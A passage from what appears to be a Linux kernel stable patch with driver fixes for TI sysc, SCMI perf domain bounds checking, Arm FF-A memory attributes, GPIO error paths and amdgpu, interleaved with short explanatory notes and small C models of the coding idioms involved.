+-		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++		   SYSC_QUIRK_SWSUP_SIDLE_ACT | SYSC_QUIRK_LEGACY_IDLE),
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x00000052, 0xffffffff,
+-		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++		   SYSC_QUIRK_SWSUP_SIDLE_ACT | SYSC_QUIRK_LEGACY_IDLE),
+ 	/* Uarts on omap4 and later */
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x50411e03, 0xffff00ff,
+-		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++		   SYSC_QUIRK_SWSUP_SIDLE_ACT | SYSC_QUIRK_LEGACY_IDLE),
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x47422e03, 0xffffffff,
+-		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++		   SYSC_QUIRK_SWSUP_SIDLE_ACT | SYSC_QUIRK_LEGACY_IDLE),
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x47424e03, 0xffffffff,
+-		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++		   SYSC_QUIRK_SWSUP_SIDLE_ACT | SYSC_QUIRK_LEGACY_IDLE),
+ 
+ 	/* Quirks that need to be set based on the module address */
+ 	SYSC_QUIRK("mcpdm", 0x40132000, 0, 0x10, -ENODEV, 0x50000800, 0xffffffff,
+@@ -1878,7 +1891,7 @@ static void sysc_pre_reset_quirk_dss(struct sysc *ddata)
+ 		dev_warn(ddata->dev, "%s: timed out %08x !+ %08x\n",
+ 			 __func__, val, irq_mask);
+ 
+-	if (sysc_soc->soc == SOC_3430) {
++	if (sysc_soc->soc == SOC_3430 || sysc_soc->soc == SOC_AM35) {
+ 		/* Clear DSS_SDI_CONTROL */
+ 		sysc_write(ddata, 0x44, 0);
+ 
+@@ -2166,8 +2179,7 @@ static int sysc_reset(struct sysc *ddata)
+ 	}
+ 
+ 	if (ddata->cfg.srst_udelay)
+-		usleep_range(ddata->cfg.srst_udelay,
+-			     ddata->cfg.srst_udelay * 2);
++		fsleep(ddata->cfg.srst_udelay);
+ 
+ 	if (ddata->post_reset_quirk)
+ 		ddata->post_reset_quirk(ddata);
+@@ -3043,6 +3055,7 @@ static void ti_sysc_idle(struct work_struct *work)
+ static const struct soc_device_attribute sysc_soc_match[] = {
+ 	SOC_FLAG("OMAP242*", SOC_2420),
+ 	SOC_FLAG("OMAP243*", SOC_2430),
++	SOC_FLAG("AM35*", SOC_AM35),
+ 	SOC_FLAG("OMAP3[45]*", SOC_3430),
+ 	SOC_FLAG("OMAP3[67]*", SOC_3630),
+ 	SOC_FLAG("OMAP443*", SOC_4430),
+@@ -3249,7 +3262,7 @@ static int sysc_check_active_timer(struct sysc *ddata)
+ 	 * can be dropped if we stop supporting old beagleboard revisions
+ 	 * A to B4 at some point.
+ 	 */
+-	if (sysc_soc->soc == SOC_3430)
++	if (sysc_soc->soc == SOC_3430 || sysc_soc->soc == SOC_AM35)
+ 		error = -ENXIO;
+ 	else
+ 		error = -EBUSY;
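
The ti-sysc hunks above switch the OMAP UARTs to SYSC_QUIRK_SWSUP_SIDLE_ACT and manage the ENAWAKEUP bit in software: cleared while the module runs, set again just before it idles. Modules that lack the bit record a negative shift, hence the >= 0 guards. A small runnable model of that guarded bit update (struct and field names are illustrative):

#include <stdint.h>
#include <stdio.h>

struct regbits {
	int enwkup_shift;	/* negative when the module has no wakeup bit */
};

static uint32_t set_wakeup(uint32_t reg, const struct regbits *rb, int enable)
{
	if (rb->enwkup_shift < 0)
		return reg;	/* nothing to do, as in the >= 0 guards above */
	if (enable)
		return reg | (1u << rb->enwkup_shift);
	return reg & ~(1u << rb->enwkup_shift);
}

int main(void)
{
	struct regbits rb = { .enwkup_shift = 2 };

	printf("set:   %#x\n", set_wakeup(0x0, &rb, 1));	/* 0x4 */
	printf("clear: %#x\n", set_wakeup(0x4, &rb, 0));	/* 0x0 */
	return 0;
}
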
+diff --git a/drivers/char/agp/parisc-agp.c b/drivers/char/agp/parisc-agp.c
+index 514f9f287a781..c6f181702b9a7 100644
+--- a/drivers/char/agp/parisc-agp.c
++++ b/drivers/char/agp/parisc-agp.c
+@@ -394,8 +394,6 @@ find_quicksilver(struct device *dev, void *data)
+ static int __init
+ parisc_agp_init(void)
+ {
+-	extern struct sba_device *sba_list;
+-
+ 	int err = -1;
+ 	struct parisc_device *sba = NULL, *lba = NULL;
+ 	struct lba_device *lbadev = NULL;
+diff --git a/drivers/clk/sprd/ums512-clk.c b/drivers/clk/sprd/ums512-clk.c
+index fc25bdd85e4ea..f43bb10bd5ae2 100644
+--- a/drivers/clk/sprd/ums512-clk.c
++++ b/drivers/clk/sprd/ums512-clk.c
+@@ -800,7 +800,7 @@ static SPRD_MUX_CLK_DATA(uart1_clk, "uart1-clk", uart_parents,
+ 			 0x250, 0, 3, UMS512_MUX_FLAG);
+ 
+ static const struct clk_parent_data thm_parents[] = {
+-	{ .fw_name = "ext-32m" },
++	{ .fw_name = "ext-32k" },
+ 	{ .hw = &clk_250k.hw  },
+ };
+ static SPRD_MUX_CLK_DATA(thm0_clk, "thm0-clk", thm_parents,
+diff --git a/drivers/clk/tegra/clk-bpmp.c b/drivers/clk/tegra/clk-bpmp.c
+index d82a71f10c2c1..39241662a412a 100644
+--- a/drivers/clk/tegra/clk-bpmp.c
++++ b/drivers/clk/tegra/clk-bpmp.c
+@@ -159,7 +159,7 @@ static unsigned long tegra_bpmp_clk_recalc_rate(struct clk_hw *hw,
+ 
+ 	err = tegra_bpmp_clk_transfer(clk->bpmp, &msg);
+ 	if (err < 0)
+-		return err;
++		return 0;
+ 
+ 	return response.rate;
+ }
+diff --git a/drivers/firmware/arm_ffa/driver.c b/drivers/firmware/arm_ffa/driver.c
+index c37e823590055..21481fc05800f 100644
+--- a/drivers/firmware/arm_ffa/driver.c
++++ b/drivers/firmware/arm_ffa/driver.c
+@@ -478,6 +478,19 @@ static u32 ffa_get_num_pages_sg(struct scatterlist *sg)
+ 	return num_pages;
+ }
+ 
++static u8 ffa_memory_attributes_get(u32 func_id)
++{
++	/*
++	 * For the memory lend or donate operation, if the receiver is a PE or
++	 * a proxy endpoint, the owner/sender must not specify the attributes
++	 */
++	if (func_id == FFA_FN_NATIVE(MEM_LEND) ||
++	    func_id == FFA_MEM_LEND)
++		return 0;
++
++	return FFA_MEM_NORMAL | FFA_MEM_WRITE_BACK | FFA_MEM_INNER_SHAREABLE;
++}
++
+ static int
+ ffa_setup_and_transmit(u32 func_id, void *buffer, u32 max_fragsize,
+ 		       struct ffa_mem_ops_args *args)
+@@ -494,8 +507,7 @@ ffa_setup_and_transmit(u32 func_id, void *buffer, u32 max_fragsize,
+ 	mem_region->tag = args->tag;
+ 	mem_region->flags = args->flags;
+ 	mem_region->sender_id = drv_info->vm_id;
+-	mem_region->attributes = FFA_MEM_NORMAL | FFA_MEM_WRITE_BACK |
+-				 FFA_MEM_INNER_SHAREABLE;
++	mem_region->attributes = ffa_memory_attributes_get(func_id);
+ 	ep_mem_access = &mem_region->ep_mem_access[0];
+ 
+ 	for (idx = 0; idx < args->nattrs; idx++, ep_mem_access++) {
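
ffa_memory_attributes_get() above encodes an FF-A rule: for a memory lend the owner must not specify the region attributes, so the field stays zero, while a share keeps normal, write-back, inner-shareable memory. A compact model of the selection (the bit values here are illustrative, not the FF-A wire encoding):

#include <stdint.h>
#include <stdio.h>

enum mem_op { MEM_SHARE, MEM_LEND };

/* Illustrative attribute bits, not the FF-A wire encoding. */
#define MEM_NORMAL          (1u << 0)
#define MEM_WRITE_BACK      (1u << 1)
#define MEM_INNER_SHAREABLE (1u << 2)

static uint8_t mem_attributes(enum mem_op op)
{
	if (op == MEM_LEND)	/* owner must not specify attributes */
		return 0;
	return MEM_NORMAL | MEM_WRITE_BACK | MEM_INNER_SHAREABLE;
}

int main(void)
{
	printf("share=%#x lend=%#x\n",
	       mem_attributes(MEM_SHARE), mem_attributes(MEM_LEND));
	return 0;
}
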
+diff --git a/drivers/firmware/arm_scmi/perf.c b/drivers/firmware/arm_scmi/perf.c
+index ecf5c4de851b7..431bda9165c3d 100644
+--- a/drivers/firmware/arm_scmi/perf.c
++++ b/drivers/firmware/arm_scmi/perf.c
+@@ -139,7 +139,7 @@ struct perf_dom_info {
+ 
+ struct scmi_perf_info {
+ 	u32 version;
+-	int num_domains;
++	u16 num_domains;
+ 	enum scmi_power_scale power_scale;
+ 	u64 stats_addr;
+ 	u32 stats_size;
+@@ -356,11 +356,26 @@ static int scmi_perf_mb_limits_set(const struct scmi_protocol_handle *ph,
+ 	return ret;
+ }
+ 
++static inline struct perf_dom_info *
++scmi_perf_domain_lookup(const struct scmi_protocol_handle *ph, u32 domain)
++{
++	struct scmi_perf_info *pi = ph->get_priv(ph);
++
++	if (domain >= pi->num_domains)
++		return ERR_PTR(-EINVAL);
++
++	return pi->dom_info + domain;
++}
++
+ static int scmi_perf_limits_set(const struct scmi_protocol_handle *ph,
+ 				u32 domain, u32 max_perf, u32 min_perf)
+ {
+ 	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
++	struct perf_dom_info *dom;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	if (PROTOCOL_REV_MAJOR(pi->version) >= 0x3 && !max_perf && !min_perf)
+ 		return -EINVAL;
+@@ -408,8 +423,11 @@ static int scmi_perf_mb_limits_get(const struct scmi_protocol_handle *ph,
+ static int scmi_perf_limits_get(const struct scmi_protocol_handle *ph,
+ 				u32 domain, u32 *max_perf, u32 *min_perf)
+ {
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
++	struct perf_dom_info *dom;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	if (dom->fc_info && dom->fc_info[PERF_FC_LIMIT].get_addr) {
+ 		struct scmi_fc_info *fci = &dom->fc_info[PERF_FC_LIMIT];
+@@ -449,8 +467,11 @@ static int scmi_perf_mb_level_set(const struct scmi_protocol_handle *ph,
+ static int scmi_perf_level_set(const struct scmi_protocol_handle *ph,
+ 			       u32 domain, u32 level, bool poll)
+ {
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
++	struct perf_dom_info *dom;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	if (dom->fc_info && dom->fc_info[PERF_FC_LEVEL].set_addr) {
+ 		struct scmi_fc_info *fci = &dom->fc_info[PERF_FC_LEVEL];
+@@ -490,8 +511,11 @@ static int scmi_perf_mb_level_get(const struct scmi_protocol_handle *ph,
+ static int scmi_perf_level_get(const struct scmi_protocol_handle *ph,
+ 			       u32 domain, u32 *level, bool poll)
+ {
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
++	struct perf_dom_info *dom;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	if (dom->fc_info && dom->fc_info[PERF_FC_LEVEL].get_addr) {
+ 		*level = ioread32(dom->fc_info[PERF_FC_LEVEL].get_addr);
+@@ -574,13 +598,14 @@ static int scmi_dvfs_device_opps_add(const struct scmi_protocol_handle *ph,
+ 	unsigned long freq;
+ 	struct scmi_opp *opp;
+ 	struct perf_dom_info *dom;
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+ 
+ 	domain = scmi_dev_domain_id(dev);
+ 	if (domain < 0)
+-		return domain;
++		return -EINVAL;
+ 
+-	dom = pi->dom_info + domain;
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	for (opp = dom->opp, idx = 0; idx < dom->opp_count; idx++, opp++) {
+ 		freq = opp->perf * dom->mult_factor;
+@@ -603,14 +628,17 @@ static int
+ scmi_dvfs_transition_latency_get(const struct scmi_protocol_handle *ph,
+ 				 struct device *dev)
+ {
++	int domain;
+ 	struct perf_dom_info *dom;
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	int domain = scmi_dev_domain_id(dev);
+ 
++	domain = scmi_dev_domain_id(dev);
+ 	if (domain < 0)
+-		return domain;
++		return -EINVAL;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+-	dom = pi->dom_info + domain;
+ 	/* uS to nS */
+ 	return dom->opp[dom->opp_count - 1].trans_latency_us * 1000;
+ }
+@@ -618,8 +646,11 @@ scmi_dvfs_transition_latency_get(const struct scmi_protocol_handle *ph,
+ static int scmi_dvfs_freq_set(const struct scmi_protocol_handle *ph, u32 domain,
+ 			      unsigned long freq, bool poll)
+ {
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
++	struct perf_dom_info *dom;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	return scmi_perf_level_set(ph, domain, freq / dom->mult_factor, poll);
+ }
+@@ -630,11 +661,14 @@ static int scmi_dvfs_freq_get(const struct scmi_protocol_handle *ph, u32 domain,
+ 	int ret;
+ 	u32 level;
+ 	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
+ 
+ 	ret = scmi_perf_level_get(ph, domain, &level, poll);
+-	if (!ret)
++	if (!ret) {
++		struct perf_dom_info *dom = pi->dom_info + domain;
++
++		/* Note domain is validated implicitly by scmi_perf_level_get */
+ 		*freq = level * dom->mult_factor;
++	}
+ 
+ 	return ret;
+ }
+@@ -643,15 +677,14 @@ static int scmi_dvfs_est_power_get(const struct scmi_protocol_handle *ph,
+ 				   u32 domain, unsigned long *freq,
+ 				   unsigned long *power)
+ {
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+ 	struct perf_dom_info *dom;
+ 	unsigned long opp_freq;
+ 	int idx, ret = -EINVAL;
+ 	struct scmi_opp *opp;
+ 
+-	dom = pi->dom_info + domain;
+-	if (!dom)
+-		return -EIO;
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	for (opp = dom->opp, idx = 0; idx < dom->opp_count; idx++, opp++) {
+ 		opp_freq = opp->perf * dom->mult_factor;
+@@ -670,10 +703,16 @@ static int scmi_dvfs_est_power_get(const struct scmi_protocol_handle *ph,
+ static bool scmi_fast_switch_possible(const struct scmi_protocol_handle *ph,
+ 				      struct device *dev)
+ {
++	int domain;
+ 	struct perf_dom_info *dom;
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+ 
+-	dom = pi->dom_info + scmi_dev_domain_id(dev);
++	domain = scmi_dev_domain_id(dev);
++	if (domain < 0)
++		return false;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return false;
+ 
+ 	return dom->fc_info && dom->fc_info[PERF_FC_LEVEL].set_addr;
+ }
+@@ -819,6 +858,8 @@ static int scmi_perf_protocol_init(const struct scmi_protocol_handle *ph)
+ 	if (!pinfo)
+ 		return -ENOMEM;
+ 
++	pinfo->version = version;
++
+ 	ret = scmi_perf_attributes_get(ph, pinfo);
+ 	if (ret)
+ 		return ret;
+@@ -838,8 +879,6 @@ static int scmi_perf_protocol_init(const struct scmi_protocol_handle *ph)
+ 			scmi_perf_domain_init_fc(ph, domain, &dom->fc_info);
+ 	}
+ 
+-	pinfo->version = version;
+-
+ 	return ph->set_priv(ph, pinfo);
+ }
+ 
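
Every SCMI perf hunk above funnels domain access through scmi_perf_domain_lookup(), which bounds-checks the index and returns an ERR_PTR instead of silently indexing past dom_info. A runnable userspace model of that kernel idiom, with ERR_PTR/IS_ERR/PTR_ERR reimplemented the way the kernel defines them:

#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_ERRNO 4095

static void *ERR_PTR(long err)      { return (void *)err; }
static long  PTR_ERR(const void *p) { return (long)p; }
static int   IS_ERR(const void *p)
{
	return (uintptr_t)p >= (uintptr_t)-MAX_ERRNO;
}

struct perf_dom { unsigned int id; };

static struct perf_dom dom_info[4];

static struct perf_dom *dom_lookup(unsigned int domain)
{
	if (domain >= 4)	/* num_domains */
		return ERR_PTR(-EINVAL);
	return &dom_info[domain];
}

int main(void)
{
	struct perf_dom *dom = dom_lookup(7);

	if (IS_ERR(dom))
		printf("lookup failed: %ld\n", PTR_ERR(dom));	/* -22 */
	return 0;
}
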
+diff --git a/drivers/firmware/cirrus/cs_dsp.c b/drivers/firmware/cirrus/cs_dsp.c
+index 81c5f94b1be11..64ed9d3f5d5d8 100644
+--- a/drivers/firmware/cirrus/cs_dsp.c
++++ b/drivers/firmware/cirrus/cs_dsp.c
+@@ -1821,15 +1821,15 @@ static int cs_dsp_adsp2_setup_algs(struct cs_dsp *dsp)
+ 		return PTR_ERR(adsp2_alg);
+ 
+ 	for (i = 0; i < n_algs; i++) {
+-		cs_dsp_info(dsp,
+-			    "%d: ID %x v%d.%d.%d XM@%x YM@%x ZM@%x\n",
+-			    i, be32_to_cpu(adsp2_alg[i].alg.id),
+-			    (be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff0000) >> 16,
+-			    (be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff00) >> 8,
+-			    be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff,
+-			    be32_to_cpu(adsp2_alg[i].xm),
+-			    be32_to_cpu(adsp2_alg[i].ym),
+-			    be32_to_cpu(adsp2_alg[i].zm));
++		cs_dsp_dbg(dsp,
++			   "%d: ID %x v%d.%d.%d XM@%x YM@%x ZM@%x\n",
++			   i, be32_to_cpu(adsp2_alg[i].alg.id),
++			   (be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff0000) >> 16,
++			   (be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff00) >> 8,
++			   be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff,
++			   be32_to_cpu(adsp2_alg[i].xm),
++			   be32_to_cpu(adsp2_alg[i].ym),
++			   be32_to_cpu(adsp2_alg[i].zm));
+ 
+ 		alg_region = cs_dsp_create_region(dsp, WMFW_ADSP2_XM,
+ 						  adsp2_alg[i].alg.id,
+@@ -1954,14 +1954,14 @@ static int cs_dsp_halo_setup_algs(struct cs_dsp *dsp)
+ 		return PTR_ERR(halo_alg);
+ 
+ 	for (i = 0; i < n_algs; i++) {
+-		cs_dsp_info(dsp,
+-			    "%d: ID %x v%d.%d.%d XM@%x YM@%x\n",
+-			    i, be32_to_cpu(halo_alg[i].alg.id),
+-			    (be32_to_cpu(halo_alg[i].alg.ver) & 0xff0000) >> 16,
+-			    (be32_to_cpu(halo_alg[i].alg.ver) & 0xff00) >> 8,
+-			    be32_to_cpu(halo_alg[i].alg.ver) & 0xff,
+-			    be32_to_cpu(halo_alg[i].xm_base),
+-			    be32_to_cpu(halo_alg[i].ym_base));
++		cs_dsp_dbg(dsp,
++			   "%d: ID %x v%d.%d.%d XM@%x YM@%x\n",
++			   i, be32_to_cpu(halo_alg[i].alg.id),
++			   (be32_to_cpu(halo_alg[i].alg.ver) & 0xff0000) >> 16,
++			   (be32_to_cpu(halo_alg[i].alg.ver) & 0xff00) >> 8,
++			   be32_to_cpu(halo_alg[i].alg.ver) & 0xff,
++			   be32_to_cpu(halo_alg[i].xm_base),
++			   be32_to_cpu(halo_alg[i].ym_base));
+ 
+ 		ret = cs_dsp_halo_create_regions(dsp, halo_alg[i].alg.id,
+ 						 halo_alg[i].alg.ver,
+diff --git a/drivers/firmware/imx/imx-dsp.c b/drivers/firmware/imx/imx-dsp.c
+index a6c06d7476c32..1f410809d3ee4 100644
+--- a/drivers/firmware/imx/imx-dsp.c
++++ b/drivers/firmware/imx/imx-dsp.c
+@@ -115,6 +115,7 @@ static int imx_dsp_setup_channels(struct imx_dsp_ipc *dsp_ipc)
+ 		dsp_chan->idx = i % 2;
+ 		dsp_chan->ch = mbox_request_channel_byname(cl, chan_name);
+ 		if (IS_ERR(dsp_chan->ch)) {
++			kfree(dsp_chan->name);
+ 			ret = PTR_ERR(dsp_chan->ch);
+ 			if (ret != -EPROBE_DEFER)
+ 				dev_err(dev, "Failed to request mbox chan %s ret %d\n",
+diff --git a/drivers/gpio/gpio-pmic-eic-sprd.c b/drivers/gpio/gpio-pmic-eic-sprd.c
+index e518490c4b681..ebbbcb54270d1 100644
+--- a/drivers/gpio/gpio-pmic-eic-sprd.c
++++ b/drivers/gpio/gpio-pmic-eic-sprd.c
+@@ -337,6 +337,7 @@ static int sprd_pmic_eic_probe(struct platform_device *pdev)
+ 	pmic_eic->chip.set_config = sprd_pmic_eic_set_config;
+ 	pmic_eic->chip.set = sprd_pmic_eic_set;
+ 	pmic_eic->chip.get = sprd_pmic_eic_get;
++	pmic_eic->chip.can_sleep = true;
+ 
+ 	pmic_eic->intc.name = dev_name(&pdev->dev);
+ 	pmic_eic->intc.irq_mask = sprd_pmic_eic_irq_mask;
+diff --git a/drivers/gpio/gpio-tb10x.c b/drivers/gpio/gpio-tb10x.c
+index de6afa3f97168..05357473d2a11 100644
+--- a/drivers/gpio/gpio-tb10x.c
++++ b/drivers/gpio/gpio-tb10x.c
+@@ -195,7 +195,7 @@ static int tb10x_gpio_probe(struct platform_device *pdev)
+ 				handle_edge_irq, IRQ_NOREQUEST, IRQ_NOPROBE,
+ 				IRQ_GC_INIT_MASK_CACHE);
+ 		if (ret)
+-			return ret;
++			goto err_remove_domain;
+ 
+ 		gc = tb10x_gpio->domain->gc->gc[0];
+ 		gc->reg_base                         = tb10x_gpio->base;
+@@ -209,6 +209,10 @@ static int tb10x_gpio_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	return 0;
++
++err_remove_domain:
++	irq_domain_remove(tb10x_gpio->domain);
++	return ret;
+ }
+ 
+ static int tb10x_gpio_remove(struct platform_device *pdev)
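
The tb10x probe fix above is the standard goto-based unwind: the irq_domain created earlier in probe is now removed when a later step fails, instead of leaking. A generic runnable sketch of the idiom, with malloc/free standing in for the irq_domain calls:

#include <stdio.h>
#include <stdlib.h>

/* Probe-style unwind: release resources in reverse order via labels. */
static int probe_model(int fail_late)
{
	int ret;
	void *domain = malloc(16);	/* stands in for irq_domain creation */

	if (!domain)
		return -12;		/* -ENOMEM */

	if (fail_late) {		/* stands in for generic-chip setup failing */
		ret = -22;		/* -EINVAL */
		goto err_remove_domain;
	}
	return 0;			/* domain stays live for the device */

err_remove_domain:
	free(domain);			/* stands in for irq_domain_remove() */
	return ret;
}

int main(void)
{
	printf("ok=%d fail=%d\n", probe_model(0), probe_model(1));
	return 0;
}
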
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
+index 9e3313dd956ae..24b4bd6bb2771 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
+@@ -896,12 +896,17 @@ int amdgpu_info_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 			struct atom_context *atom_context;
+ 
+ 			atom_context = adev->mode_info.atom_context;
+-			memcpy(vbios_info.name, atom_context->name, sizeof(atom_context->name));
+-			memcpy(vbios_info.vbios_pn, atom_context->vbios_pn, sizeof(atom_context->vbios_pn));
+-			vbios_info.version = atom_context->version;
+-			memcpy(vbios_info.vbios_ver_str, atom_context->vbios_ver_str,
+-						sizeof(atom_context->vbios_ver_str));
+-			memcpy(vbios_info.date, atom_context->date, sizeof(atom_context->date));
++			if (atom_context) {
++				memcpy(vbios_info.name, atom_context->name,
++				       sizeof(atom_context->name));
++				memcpy(vbios_info.vbios_pn, atom_context->vbios_pn,
++				       sizeof(atom_context->vbios_pn));
++				vbios_info.version = atom_context->version;
++				memcpy(vbios_info.vbios_ver_str, atom_context->vbios_ver_str,
++				       sizeof(atom_context->vbios_ver_str));
++				memcpy(vbios_info.date, atom_context->date,
++				       sizeof(atom_context->date));
++			}
+ 
+ 			return copy_to_user(out, &vbios_info,
+ 						min((size_t)size, sizeof(vbios_info))) ? -EFAULT : 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c b/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
+index 09fdcd20cb919..c52a378396af1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
+@@ -344,6 +344,9 @@ static void nbio_v4_3_init_registers(struct amdgpu_device *adev)
+ 		data &= ~RCC_DEV0_EPF2_STRAP2__STRAP_NO_SOFT_RESET_DEV0_F2_MASK;
+ 		WREG32_SOC15(NBIO, 0, regRCC_DEV0_EPF2_STRAP2, data);
+ 	}
++	if (amdgpu_sriov_vf(adev))
++		adev->rmmio_remap.reg_offset = SOC15_REG_OFFSET(NBIO, 0,
++			regBIF_BX_DEV0_EPF0_VF0_HDP_MEM_COHERENCY_FLUSH_CNTL) << 2;
+ }
+ 
+ static u32 nbio_v4_3_get_rom_offset(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index d150a90daa403..56af7b5abac14 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -755,7 +755,7 @@ static int soc21_common_hw_init(void *handle)
+ 	 * for the purpose of expose those registers
+ 	 * to process space
+ 	 */
+-	if (adev->nbio.funcs->remap_hdp_registers)
++	if (adev->nbio.funcs->remap_hdp_registers && !amdgpu_sriov_vf(adev))
+ 		adev->nbio.funcs->remap_hdp_registers(adev);
+ 	/* enable the doorbell aperture */
+ 	soc21_enable_doorbell_aperture(adev, true);
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+index c06ada0844ba1..0b87034d9dd51 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+@@ -201,7 +201,7 @@ static int add_queue_mes(struct device_queue_manager *dqm, struct queue *q,
+ 
+ 	if (q->wptr_bo) {
+ 		wptr_addr_off = (uint64_t)q->properties.write_ptr & (PAGE_SIZE - 1);
+-		queue_input.wptr_mc_addr = ((uint64_t)q->wptr_bo->tbo.resource->start << PAGE_SHIFT) + wptr_addr_off;
++		queue_input.wptr_mc_addr = amdgpu_bo_gpu_offset(q->wptr_bo) + wptr_addr_off;
+ 	}
+ 
+ 	queue_input.is_kfd_process = 1;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+index 6d6588b9beed7..ec8a576ac5a9e 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+@@ -1349,9 +1349,8 @@ void kfd_flush_tlb(struct kfd_process_device *pdd, enum TLB_FLUSH_TYPE type);
+ 
+ static inline bool kfd_flush_tlb_after_unmap(struct kfd_dev *dev)
+ {
+-	return KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 2) ||
+-	       (KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 1) &&
+-	       dev->adev->sdma.instance[0].fw_version >= 18) ||
++	return KFD_GC_VERSION(dev) > IP_VERSION(9, 4, 2) ||
++	       (KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 1) && dev->sdma_fw_version >= 18) ||
+ 	       KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 0);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
+index 9378c98d02cfe..508f5fe268484 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
+@@ -973,7 +973,9 @@ void dce110_edp_backlight_control(
+ 		return;
+ 	}
+ 
+-	if (link->panel_cntl) {
++	if (link->panel_cntl && !(link->dpcd_sink_ext_caps.bits.oled ||
++		link->dpcd_sink_ext_caps.bits.hdr_aux_backlight_control == 1 ||
++		link->dpcd_sink_ext_caps.bits.sdr_aux_backlight_control == 1)) {
+ 		bool is_backlight_on = link->panel_cntl->funcs->is_panel_backlight_on(link->panel_cntl);
+ 
+ 		if ((enable && is_backlight_on) || (!enable && !is_backlight_on)) {
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi83.c b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+index 55efd3eb66723..3f43b44145a89 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi83.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+@@ -655,7 +655,9 @@ static int sn65dsi83_host_attach(struct sn65dsi83 *ctx)
+ 
+ 	dsi->lanes = dsi_lanes;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
